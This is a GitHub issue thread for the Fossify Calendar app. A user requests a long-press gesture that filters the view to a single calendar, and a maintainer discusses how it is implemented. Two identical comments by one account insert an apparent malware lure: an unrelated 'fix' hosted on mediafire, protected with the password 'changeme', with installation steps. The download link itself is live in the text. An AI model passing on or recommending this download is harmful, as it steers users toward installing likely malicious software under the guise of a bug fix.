### ISSUE TITLE
Ability to see individual calendar via long press

### ISSUE THREAD

**Issue by m1steron** [FossifyOrg/Calendar#309]
### Checklist

- [X] I made sure that there are **no existing issues** - [open](https://github.com/FossifyOrg/Calendar/issues) or [closed](https://github.com/FossifyOrg/Calendar/issues?q=is%3Aissue+is%3Aclosed) - to which I could contribute my information.
- [X] I made sure that there are **no existing discussions** - [open](https://github.com/FossifyOrg/Calendar/discussions) or [closed](https://github.com/FossifyOrg/Calendar/discussions?discussions_q=is%3Aclosed) - to which I could contribute my information.
- [X] I have read the FAQs inside the app (Menu -> About -> FAQs) and my problem isn't listed.
- [X] **I have taken the time to fill in all the required details. I understand that the bug report will be dismissed otherwise.**
- [X] This issue contains only one feature request.
- [X] I have read and understood the [contribution guidelines](https://github.com/FossifyOrg/Calendar/blob/master/CONTRIBUTING.md).
- [ ] I optionally [donated](https://fossify.org/donate) to support the Fossify mission.

### Feature description

Hi,

Is it possible to add a 'Long press' feature to the individual calendar categories listed along the bottom of the app, whereby a long press of 2-3 seconds on one will only display that calendars entries? With a second long press on the selected calendar returning it to normal (all calendar categories). I hope this makes sense.

Personally I think this would be better than having to disable all the other calendars to explicitly see the one you want.

What do you think?

### Why do you want this feature?

Improvements to the gui

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by naveensingh** [comment]
> With a second long press on the selected calendar returning it to normal (all calendar categories).

The way this is implemented now, if you long press some calendar and restart the app, you'll lose your previous selections. We'll consider changing this behavior by persisting the original selections once we get some user feedback.

**Comment by m1steron** [comment]
This is great. I can finally ditch Google calendar! Thank you.

**Comment by m1steron** [comment]
> > With a second long press on the selected calendar returning it to normal (all calendar categories).
> 
> The way this is implemented now, if you long press some calendar and restart the app, you'll lose your previous selections. We'll consider changing this behavior by persisting the original selections once we get some user feedback.

Hi again, might the inclusion of an "All" button to show all calendars help with this issue? Alternatively, a show/hide button which enables/disables all calendar categories.

**Comment by naveensingh** [comment]
> Hi again, might the inclusion of an "All" button to show all calendars help with this issue?

I think the filter dialog is quick enough for cases like this.

> The way this is implemented now, if you long press some calendar and restart the app, you'll lose your previous selections.

It's not exactly a "bug", more like a behavior that can be revisited. It's okay as it is for now.

**Comment by m1steron** [comment]
Agreed, I think the way it works now is almost perfect. Thanks for your hard work.
